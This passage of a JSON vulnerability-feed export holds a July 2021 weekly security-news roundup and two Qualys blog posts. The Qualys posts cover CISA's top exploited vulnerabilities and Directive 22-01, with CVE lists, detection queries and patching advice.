"The [Australian Cyber Security Centre] has observed actors exploiting this vulnerability to compromise multiple hosts and deploy additional malware and tools," the organization said in an alert. ACSC didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them".\n * [A new exploit for vSphere Client](<https://vulners.com/packetstorm/PACKETSTORM:163487>) (CVE-2021-21985). The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n * [Apache Tomcat 9.0.0.M1 - Open Redirect](<https://vulners.com/exploitdb/EDB-ID:50118>) (CVE-2018-11784). "When the default servlet in Apache Tomcat [\u2026] returned a redirect to a directory [\u2026] a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice".\n * [Apache Tomcat 9.0.0.M1 - Cross-Site Scripting](<https://vulners.com/exploitdb/EDB-ID:50119>) (CVE-2019-0221). "The SSI printenv command in Apache Tomcat [\u2026] echoes user provided data without escaping and is, therefore, vulnerable to XSS". However, in real life this is unlikely to be used. "SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website".\n\nFor the last 2 weeks I have mentioned PrintNightmare and Kaseya. These topics seem to be coming to their logical end. But there is still something to tell about them.\n\n * Microsoft has shared guidance revealing yet [another vulnerability connected to its Windows Print Spooler service](<https://www.theregister.com/2021/07/16/spooler_service_local_privilege_escalation/>), saying it is "developing a security update." 
\nThe latest Print Spooler service vuln [\u2026] is an elevation of privilege [\u2026]. An attacker needs to be able to execute code on the victim system to exploit the vulnerability [\u2026]. The solution? For now, you can only "stop and disable the Print Spooler service," disabling both the ability to print locally and remotely. \n * Following the supply-chain ransomware attack, Kaseya had urged on-premises VSA customers to shut down their servers until a patch was available. Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. 
Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). "A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. 
I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). \n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. 
\n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, 
CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,`CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities using the \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, 
"impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." 
[This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) requires urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to the Binding Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. 
The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) vulnerabilities need to be patched in the next two weeks, or by **November 17, 2021**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ 
`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this 
vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" vulnerabilities by **May 3, 2022**. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud 
Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[`CVE-2021-1732`,`CVE-2020-1350`,`CVE-2020-1472`,`CVE-2021-26855`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2020-0601`,`CVE-2021-26857`,`CVE-2021-22893`,`CVE-2020-8243`,`CVE-2021-22900`,`CVE-2021-22894`,`CVE-2020-8260`,`CVE-2021-22899`,`CVE-2019-11510`]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial component of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. 
Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", 
"CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}